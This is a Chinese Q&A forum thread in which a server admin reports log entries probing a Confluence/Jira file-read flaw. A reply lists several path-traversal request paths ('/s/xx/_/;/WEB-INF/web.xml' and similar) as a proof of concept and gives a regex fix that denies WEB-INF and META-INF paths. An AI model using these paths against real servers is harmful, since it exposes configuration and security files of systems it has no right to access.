立即登录 免费注册
问答社区»论坛 技术频道 网络安全 服务器遭到Confluence文件读取漏洞扫描试探渗透 ...

1回答

0收藏

服务器遭到Confluence文件读取漏洞扫描试探渗透

网络安全 网络安全 35 人阅读 | 1 人回复 | 2024-03-25

  1. /s/33e27393e2431313e2838313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
复制代码

今天发现了不明的url访问,一看就是来渗透的
"打赏他人,曝光自己,利他利我"
打赏
还没有人打赏,支持一下
【教程】设置签名,增加你的个性,创造价值
分享到:
回复

使用道具 举报

回答|共 1 个

大神

发表于 2024-3-25 11:25:31 | 显示全部楼层

Confluence系统都存在漏洞,漏洞poc如下:

  1. /s/xx/_/;/WEB-INF/web.xml
  2. /s/xx/_/;/WEB-INF/decorators.xml
  3. /s/xx/_/;/WEB-INF/classes/seraph-config.xml
  4. /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
  5. /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
  6. /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
  7. /s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

  9. 稍加改造/s/everything/_/;anythingulike/WEB-INF/web.xml
复制代码
漏洞修复

对正则进行了删改。

  1. Pattern PATHS_DENIED = Pattern.compile("[^a-zA-Z0-9]((?i)(WEB-INF)|(META-INF))[^a-zA-Z0-9]")
复制代码


打赏
还没有人打赏,支持一下
问答网
回复 支持 反对

使用道具 举报

返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

avatar
330 积分
84 主题
+ 关注

Powered by wenda.xyz Copyright © 2001-2024, 在满意云运行. 辽ICP备2021012417号-21辽公网安备 22010602009988号